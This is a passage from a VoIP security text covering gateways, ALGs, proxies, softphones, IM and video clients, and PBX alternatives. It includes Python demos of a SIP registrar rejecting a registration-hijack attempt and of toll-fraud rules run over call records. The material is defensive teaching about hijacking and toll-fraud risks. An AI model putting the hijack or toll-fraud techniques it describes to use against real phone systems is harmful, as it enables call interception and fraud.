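    """HTTP Digest as SIP uses it (RFC 3261 section 22; MD5, no qop)."""
    ha1 = hashlib.md5(f"{user}:{REALM}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


class Registrar:
    """Location service: address-of-record -> (contact, expiry)."""
    def __init__(self, credentials, clock):
        self.credentials, self.clock, self.bindings, self.nonces = credentials, clock, {}, set()

    def register(self, msg):
        _, h = parse_sip(msg)
        aor = re.search(r"<([^>]+)>", h["to"]).group(1)
        auth = dict(re.findall(r'(\w+)="([^"]*)"', h.get("authorization", "")))
        user = auth.get("username")
        # Without this check anyone who can reach the registrar could rebind Johnny's
        # number to their own phone: the request must prove knowledge of the password
        # against a fresh, single-use nonce, and the user must own the address-of-record.
        valid = (auth.get("nonce") in self.nonces and user in self.credentials
                 and aor == f"sip:{user}@{REALM}"
                 and auth.get("response") == digest_response(
                     user, self.credentials[user], "REGISTER", auth.get("uri", ""), auth["nonce"]))
        if not valid:
            nonce = secrets.token_hex(8)
            self.nonces.add(nonce)
            return f'SIP/2.0 401 Unauthorized\r\nWWW-Authenticate: Digest realm="{REALM}", nonce="{nonce}"\r\n\r\n'
        self.nonces.discard(auth["nonce"])
        contact = re.search(r"<([^>]+)>", h["contact"]).group(1)
        expires = int(h.get("expires", "3600"))
        if expires == 0:
            self.bindings.pop(aor, None)
        else:
            self.bindings[aor] = (contact, self.clock() + expires)
        return f"SIP/2.0 200 OK\r\nContact: <{contact}>;expires={expires}\r\n\r\n"

    def lookup(self, aor):
        contact, expiry = self.bindings.get(aor, (None, 0))
        return contact if expiry > self.clock() else None


def redirect_invite(registrar, msg):
    """Redirect server: answer 302 + Contact from the bindings instead of forwarding."""
    contact = registrar.lookup(parse_sip(msg)[0].split(" ")[1])
    if contact is None:
        return "SIP/2.0 480 Temporarily Unavailable\r\n\r\n"
    return f"SIP/2.0 302 Moved Temporarily\r\nContact: <{contact}>\r\n\r\n"


def ua_register(registrar, user, password, contact):
    """User agent: send REGISTER, answer the 401 challenge, return the final status."""
    def build(auth=""):
        return (f"REGISTER sip:{REALM} SIP/2.0\r\nTo: <sip:{user}@{REALM}>\r\nFrom: <sip:{user}@{REALM}>\r\n"
                f"Contact: <{contact}>\r\nExpires: 3600\r\n{auth}\r\n")
    reply = registrar.register(build())
    if reply.startswith("SIP/2.0 401"):
        nonce = re.search(r'nonce="([^"]+)"', reply).group(1)
        resp = digest_response(user, password, "REGISTER", f"sip:{REALM}", nonce)
        reply = registrar.register(build(f'Authorization: Digest username="{user}", realm="{REALM}", '
                                         f'nonce="{nonce}", uri="sip:{REALM}", response="{resp}"\r\n'))
    return int(reply.split(" ")[1])


def ua_call(registrar, target):
    """User agent: INVITE the address-of-record; on 3xx, re-INVITE the Contact given."""
    reply = redirect_invite(registrar, f"INVITE {target} SIP/2.0\r\nTo: <{target}>\r\n\r\n")
    status = int(reply.split(" ")[1])
    new_uri = re.search(r"<([^>]+)>", reply).group(1) if 300 <= status < 400 else None
    return status, new_uri


def demo():
    clock = [1_000_000]                                       # constructed clock (seconds)
    registrar = Registrar({"johnny": "s3cret"}, lambda: clock[0])
    johnny = f"sip:johnny@{REALM}"
    out = {"register": ua_register(registrar, "johnny", "s3cret", "sip:johnny@203.0.113.7:5060"),
           "call": ua_call(registrar, johnny),
           "hijack": ua_register(registrar, "johnny", "guess", "sip:mallory@198.51.100.9"),
           "call_after_hijack": ua_call(registrar, johnny)}
    clock[0] += 3601                                          # binding expired: phone gone
    out["call_expired"] = ua_call(registrar, johnny)
    return out
```

Run `demo()` and the hijack attempt is answered 401 and leaves Johnny's binding intact, while a caller after the binding's expiry gets 480 rather than a stale address. A registrar that skipped the Digest check, or that did not tie the authenticated user to the address-of-record, would return 200 to Mallory and ring her phone for Johnny's calls.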

Media Gateways

A gateway is a device that translates between protocols in general by providing logic and translation between otherwise incompatible interfaces. A voice or media gateway in particular tends to translate between PSTN (trunking) protocols and interfaces and local line protocols and interfaces (though that’s not universally true). In addition, the potential protocols and interfaces that a voice gateway now might support include Ethernet and VoIP protocols as well. The voice gateway could have H.323 phones on one side and an ISDN trunk on the other (both digital) or a VoIP phone on one side and an analog loop to the carrier, or even VoIP on both sides (say, H.323 to the station and SIP trunking to the carrier). The point is that there are literally hundreds of different equipment classes that all fall under the voice gateway moniker and thousands of classes that fall under gateway to begin with.
One class of VoIP media gateway connects traditional analog or digital phone equipment or networks to VoIP equipment or networks. A simple home-user implementation of a VoIP gateway like this is an ATA, or Analog Telephone Adaptor. At a minimum a VoIP media gateway will have both a phone interface (analog or digital) and an Ethernet interface. For an ATA, a regular analog phone is connected to the adaptor, which then translates the signal to digital and passes it back over the Ethernet. Of course, media gateways can get much more complex than this. PBX vendors have split out the line-card cabinet portion of their product and recast it as a media gateway, with the gateway under the control of a media server. IP routing companies have added analog and digital voice/video interfaces to routers and recast them as media gateways. And in many respects these products do contain overlapping functionality even though they may not be equivalent.

Firewalls and Application-Layer Gateways

Within a firewall, special code for specific protocols (like FTP, which uses separate control and data connections much as VoIP does) provides the logic for the address filtering and translation needed for that protocol to pass through safely. One name for this is the Application Layer Gateway (ALG). Any protocol that carries IP addresses and ports inside its payload, or that runs its control and data (media) streams separately, needs ALG code to get through a deep-packet-inspection and filtering device. For SIP that means parsing the SDP body of each INVITE and answer to learn the dynamically chosen RTP ports, opening only those pinholes for the duration of the call, and rewriting the private addresses when NAT is involved (H.323 needs the same treatment for H.245). Because VoIP protocols and their vendor extensions keep changing, firewall vendors' ALGs are constantly playing catch-up, and a badly behaved ALG will break calls it does not understand. An ALG also has to see the signaling in the clear; once SIP runs over TLS, the firewall can neither read nor rewrite it. Tests of real-time performance under load may further reveal that QoS targets cannot be met with a given ALG. All of this can cause VoIP to fail under load at the perimeter and has forced consideration of VoIP application proxies as an alternative.

Application Proxies

A proxy server acts as an intermediary for transactions or calls. If Johnny's phone speaks IAX and Jen's phone speaks only SIP, something in between must translate the messages (strictly, that something is a gateway or a back-to-back user agent rather than a SIP proxy, which by definition forwards SIP requests). Even when both sides speak the same protocol, be it HTTP or SIP, security, NAT or other boundaries call for either a proxy or packet manipulation by an Application Layer Gateway (ALG) within a firewall. The benefit of an application proxy is that it can be designed specifically for a protocol (or even for a manufacturer's implementation of a protocol). In addition to boundary traversal, a proxy can enforce access control, checking that a user is allowed to place a call before letting it proceed, and the best proxies also guard against malformed messages and certain types of DoS attack, because they terminate the session themselves rather than passing packets through. Depending on the complexity of your call requirements, a proxy may be integrated into a PBX or media server, or it may be an entirely separate piece of hardware.

Endpoints (User Agents)

In a phone system, an endpoint on the network was known as a terminal, reflecting the fact that it was a slave to the switch or call-control server. But today’s endpoints may possess much more intelligence, thus in the SIP world the term User Agent is preferred. This could be a hardware IP telephone, a softphone, or any other device or service capable of originating or terminating a communication session directly or as a proxy for the end user.
Softphones
With the advent of VoIP technology, users are able to break free of classical physical restrictions of communication, namely the special-purpose telephone terminal. A softphone is a piece of software that handles voice traffic through a computer using a standard computer speaker and microphone (or improved audio equipment that is connected through an audio or multimedia card). Softphones can emulate the look and feel of a traditional phone, using the familiar key layout of a traditional phone and often even emulating the DTMF sounds you hear when you dial a call. Or it may look more like an instant messaging (IM) client, and act like audio chat added to IM.
In fact, a softphone doesn’t even need a computer microphone or speaker: my favorite doesn’t need to send media through the computer at all in telecommuter mode—it just uses H.323 signaling to tell my media server which PSTN number (or extension) to dial for sending and receiving the audio. This lets me turn any phone into a fully featured clone of my work extension without regard to QoS available to me on my Internet connection.
Because a softphone resides on a PC, the principle of logically separating voice and data networks is defeated: the PC must sit in both domains, so whatever compromises the PC (malware, a browser exploit) now has a foothold on the voice network. You will need to weigh this trade-off as you design security policy for your VoIP network, although the long-term trend favors voice-data integration, so at best maintaining physical separation can only be a temporary strategy.
Consumer softphones have exploded over the past few years, and nothing is hotter in that space than Skype, the brainchild of the people who brought us the Kazaa file-sharing framework. Using peer-to-peer technology and encrypted signaling and media channels, Skype has proven both easy to set up and to use securely by end users, while simultaneously being a thorn in the side of network administrators: its protocol and encryption are proprietary and cannot be audited, a well-connected corporate host may be pressed into service as a supernode relaying strangers' calls, and it aggressively tunnels past firewalls (falling back to TCP ports 80 and 443) to create call traffic. For those reasons many enterprise security groups treat it as a threat.
One of Skype's major enhancements over instant-messaging voice is its wideband codec, which gives better fidelity than the narrowband codecs of the traditional telephone network, so calls between Skype users sound better than a landline call. Another major benefit is the ability to reach any phone on the PSTN through SkypeOut gateways (a call leaving through a gateway is, of course, no longer encrypted end to end). With its PSTN gateway, Skype has become an attractive alternative for small overseas call centers and other Internet businesses.
IM Clients
Instant messaging is perhaps the dominant means of real-time communication on the Internet today. IM's roots can be traced to the Internet Relay Chat (IRC) networks, which introduced the chat room but did not track online presence and never reached IM's popularity. Just as IM is the next logical step from IRC, voice chat is the next leap from text chat. Most of today's popular IM clients include voice, among them AOL's Instant Messenger, Yahoo! Messenger, and MSN Messenger. Skype took the opposite approach and built a client with voice as the star and text chat as an afterthought. Even Google jumped on the IM bandwagon with Google Talk. Let's look at these clients to see what makes them similar and what makes them different.
AIM, AOL's IM service, was not the first on the scene, but it has the largest user base. Initially AIM was limited to subscribers of the AOL Internet service, but it was eventually opened to the Internet as a whole. With the addition of a proprietary voice capability in late 1999, AOL was a VoIP pioneer of sorts (although voice chat was first available through Mirabilis's ICQ). Yahoo! Messenger added voice soon after, and Google's more recent client has included voice from the beginning. In 2005, Yahoo! announced interoperability with Google and MSN (which also has a voice chat plug-in for Messenger that is used with its Live Communications Server product). In addition, Microsoft's Outlook e-mail client (and the entire Office suite, in the case of LCS) can be linked to Microsoft Messenger. Also worth mentioning are the Lotus Sametime IM client for Domino, which competes with Microsoft LCS in enterprise instant messaging and presence, and Jabber, which can tie together public and private IM services using the XMPP protocol.
Google Talk is the newest entrant in the IM game. Though still in its infancy, it stands to succeed largely on a philosophical standpoint: it embraces open standards (XMPP) over proprietary voice chat. Google Talk aims to connect many different voice networks through peering arrangements, so that users need not run several IM clients. Like Skype, Google seeks to bridge traditional phone calls with Internet telephony, promising to federate with SIP networks that reach the ordinary telephone network. Google recently released a library called libjingle that lets programmers add new functionality to Google Talk. It will be interesting to see where Google takes Google Talk in the future.
Video Clients
Most of us can probably think back and recall episodes of The Jetsons from when we were younger, or pictures of the AT&T PicturePhone from the 1964 World's Fair. Movies have all but promised that these devices would be a staple of everyday life in the future. And for decades, the video conference has been pushed by enterprises seeking to save money on travel (though investments in video conferencing equipment tend to sit around gathering dust). Live video on the Internet has its adherents, and today we see yet another wave of marketing aimed at the business use of video. So, will video finally take off around VoIP just as audio has, or is something different going on here?
The video phone has been tomorrow’s next big technology for 50 years but the issue has been more sociological than technological. Certainly, popular instant messaging clients have included video chat capabilities for some time now, although each client typically supports only video between other users of the same client or messaging network. And although it always gives me a kick to see someone else announcing that they’ve solved the gap with technology, the point is well taken that video is here to stay in VoIP systems—even if it doesn’t get as much use as VoIP.
The latest on the video bandwagon is the Skype 2.0 release. At only 15 frames per second and 40 to 75 kbps upload and download, Skype Video works well on a standard home DSL line or better. Other popular IM clients with video include Microsoft’s Messenger and Yahoo Instant Messenger. AIM now offers video as well.
H.323-based IP videoconferencing systems have been available in hardware and software from many sources for almost a decade at this point, so there’s no shortage of vendors in this space. And SIP video phones are available from many of these same vendors and from startup companies in the SIP space.
Wireless VoIP Clients
Over the past few years an explosion of wireless VoIP solutions has hit the marketplace. Most are immature and, if broadly deployed, can completely overrun the available bandwidth on 802.11b (or g) networks that were not engineered for high-density voice, even with QoS prioritization. Although 802.11a networks can handle higher wireless VoIP densities, they present backward-compatibility issues of their own. And we have not even reached the security issues yet! Still, the promise of WiFi VoIP is tantalizing, and most enterprises that have deployed VoIP seem to have experimented with it. The idea of a combined cellphone/WiFi phone (and maybe PDA too) seems too compelling to ignore, even if power consumption keeps the concept sidelined in the short term.


PBX Alternatives

Long before VoIP appeared, nonswitched alternatives to the PBX were available. For systems of fewer than 50 users, Key Telephone Systems (KTS) share outside lines directly among the stations and use dedicated intercom paths to talk between them. Current-generation key systems are more PBX-like than ever, so the distinction is hard to find anymore. But older key systems cannot perform advanced switching such as trunk-to-trunk transfer, the feature most often abused for toll fraud. So-called hybrid key systems, which can, should be treated like a regular PBX when it comes to security.

Centrex, IP Centrex, and hosted IP-telephony services are carrier-based PBX alternatives that provide a private dial plan plus the more popular switching features an on-site PBX would. The switching equipment, however, stays in the carrier's infrastructure and is managed by the carrier. This is a mixed blessing: it is likely to reduce the overall functionality and access-policy tailoring available to your organization, but the carrier shoulders a larger share of the responsibility for any toll fraud that results (and consequently will not provide high-risk services like trunk-to-trunk dialing without extra security measures).
More recently, IP telephony has given some manufacturers, Avaya among them, an opportunity to rearchitect their PBX approach and separate functionality once provided in a single device into multiple devices. In particular, call control and signaling can be separated from media processing and gateway services; this makes possible an architecture in which a few call control servers provide redundant service across an entire organization, with media gateways in every location where the organization has a physical presence. We'll treat this approach along with other similar VoIP architectures


Wireless & Other PBX Solutions

Wireless PBX Solutions

Several solutions for adding wireless extensions to PBX systems have been commercialized. Most PBX vendors have implemented proprietary 900 MHz-band solutions in the United States, as well as the 1900 MHz Digital Enhanced Cordless Telecommunications (DECT) ETSI standard in Europe, which has driven widespread adoption of vendor-neutral wireless there. More recently, a number of WiFi solutions have become available, as well as combination WiFi/GSM solutions that let a single device work with both cellular and enterprise PBX infrastructure.

Other PBX Solutions

Two other PBX solutions with security implications deserve discussion: Call Detail Recording (CDR) systems and voice firewalls. A CDR system logs every call on a PBX once it completes, in a standardized format: the metadata (calling and called numbers, trunks, start time, duration), not the audio. Reporting software can then analyze the data for forensic or diagnostic purposes, including spotting toll fraud after the fact. A CDR system will not, however, let you stop a fraudulent call in progress. For that you need a voice firewall, such as the one sold by SecureLogix, which shows current calls in real time, applies policy based on the type of call (voice, fax, or data modem), and lets you set notifications, authentication requirements, or other rules much like those you would set for data traffic on a data firewall.
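The after-the-fact CDR analysis described above, as an added example in Python (not code from the page or from any CDR or voice-firewall product). It parses a constructed CDR export and applies four toll-fraud rules: trunk-to-trunk calls (the feature the PBX Alternatives section singles out), international calls placed after hours, calls to an assumed list of high-risk destination prefixes, and an extension exceeding an assumed daily international-minutes ceiling. The CDR format, records, thresholds and prefix list are all assumptions for the demo.

```python
# Added example (not from the page): toll-fraud rules run over a constructed CDR export.
# The record format, thresholds, business hours and high-risk prefixes are assumptions.
import csv
import io
from collections import Counter, defaultdict
from datetime import datetime

# Constructed CDR export: start, extension, dialed number, inbound trunk, outbound trunk,
# seconds. An empty extension with an inbound trunk is a call that came in and went out.
CDR_CSV = """start,ext,dialed,trunk_in,trunk_out,seconds
2006-03-14 09:12:03,2201,02125551234,,T1-01,184
2006-03-14 10:40:55,2210,015551234567,,T1-01,62
2006-03-14 23:05:10,2399,011447700900123,,T1-02,1340
2006-03-15 01:17:42,2399,011447700900123,,T1-02,1802
2006-03-15 02:48:09,2399,011447700900456,,T1-02,2105
2006-03-15 03:20:00,,0112527790001,T1-03,T1-02,900
2006-03-15 03:25:00,,0112527790002,T1-03,T1-02,910
2006-03-15 14:02:11,2201,0113531987654,,T1-01,300
"""

INTL_PREFIX = "011"                            # North American international dial prefix
HIGH_RISK_PREFIXES = ("011232", "011252")      # assumed list of premium/high-risk destinations
AFTER_HOURS = (22, 6)                          # assumed: 22:00 to 06:00 local is after hours
INTL_MINUTES_PER_DAY = 60                      # assumed per-extension daily ceiling


def parse_cdr(text):
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        r["start"] = datetime.strptime(r["start"], "%Y-%m-%d %H:%M:%S")
        r["seconds"] = int(r["seconds"])
        rows.append(r)
    return rows


def analyze(records):
    """Return (alerts, international minutes per (extension, day))."""
    alerts, intl_minutes, volume_flagged = [], defaultdict(float), set()
    for r in records:
        intl_call = r["dialed"].startswith(INTL_PREFIX)
        hour = r["start"].hour
        after_hours = hour >= AFTER_HOURS[0] or hour < AFTER_HOURS[1]
        if r["trunk_in"] and r["trunk_out"]:
            alerts.append(("trunk-to-trunk transfer", r))
        if intl_call and after_hours:
            alerts.append(("after-hours international", r))
        if r["dialed"].startswith(HIGH_RISK_PREFIXES):
            alerts.append(("high-risk destination", r))
        if intl_call and r["ext"]:
            key = (r["ext"], r["start"].date())
            intl_minutes[key] += r["seconds"] / 60
            if intl_minutes[key] > INTL_MINUTES_PER_DAY and key not in volume_flagged:
                volume_flagged.add(key)                # one alert per extension per day
                alerts.append(("international volume", r))
    return alerts, dict(intl_minutes)


def demo():
    alerts, intl_minutes = analyze(parse_cdr(CDR_CSV))
    return Counter(rule for rule, _ in alerts), intl_minutes


if __name__ == "__main__":
    counts, minutes = demo()
    for rule, n in counts.items():
        print(f"{n:2d}  {rule}")
```

Every one of these alerts fires hours after the money was spent, which is the limitation the text points out; the same rules wired into a voice firewall's real-time policy would have blocked the trunk-to-trunk calls outright.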


All PBX systems provide PSTN-like switching services between endpoints and adjuncts, the PSTN, and other private PBX switches (and associated private networks). Only a few of the possible adjunct systems are mentioned here. An ACD is an Automatic Call Distribution server (for use in call centers to direct calls to groups of agents), and an IVR is an Interactive Voice Response server (also commonly used in call centers to let callers use touch tones and voice prompts to select services).
So a PBX could be all IP or all analog or anything in the middle as long as it switches calls between extensions and the PSTN as needed. In the end you will find that despite the marketing hype, most VoIP systems are just PBX systems with different combinations of support for IP lines and trunks. In some cases, the call control part of the system is split out from the gateway that handles the non-IP electrical interfaces. Or it’s pushed out to a service provider. But the basic switching concept is preserved somewhere across the system as a whole. Regardless, understanding basic PBX terminology will help you understand the underlying architecture of the VoIP systems you may encounter, so let’s start there.
